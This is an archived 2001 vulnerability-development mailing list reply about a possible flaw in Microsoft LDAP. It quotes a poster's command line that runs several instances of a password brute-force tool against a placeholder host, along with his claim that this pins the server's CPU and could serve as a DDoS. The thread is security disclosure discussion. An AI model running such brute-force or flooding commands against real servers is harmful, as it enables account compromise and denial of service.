Vulnerability Development mailing list archives
Re: implementation problem in Microsoft LDAP?
From: "M.Grootveld" <M.Grootveld () ITsec nl>
Date: Mon, 02 Jul 2001 12:38:18 +0200
Hi SardaƱons, Eliel wrote:
<snip>
Problem 2: Another problem I have seen is that when I use my brute force program (brute_force_ldap) to try to guess a Windows password and I run 5 or more instance of my program at the same time like this: ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_1 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_2 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_3 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_4 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_5 -l 8 & ./bf_ldap -s www.victim.com -d victim.com -u non_existent_user_6 -l 8 & the CPU usage in www.victim.com is at 100%!!! And the console is unusable in the windows box. I try this using a none_existent_user and an existent_user and it consumes more resources with non existent users. So an attacker can use my program as a Distributed Denial Of service Attack (ddos) running it from different machines at the same time with a unique target. (www.victim.com).
Could you provide any additional details about your exploit code and the configuration you are using. With the information you provided I can't tell if the second problem is caused by an implementation problem or that the LDAP service is perhaps configured incorrectly. Greetings M. Grootveld
Current thread:
- Re: implementation problem in Microsoft LDAP? M.Grootveld (Jul 02)
- <Possible follow-ups>
- RE: implementation problem in Microsoft LDAP? SardaƱons , Eliel (Jul 02)
- Re: implementation problem in Microsoft LDAP? Jeremy Sanders (Jul 02)
- Re: implementation problem in Microsoft LDAP? Laura A. Robinson (Jul 02)
- Re: implementation problem in Microsoft LDAP? Timothy . Lyons (Jul 02)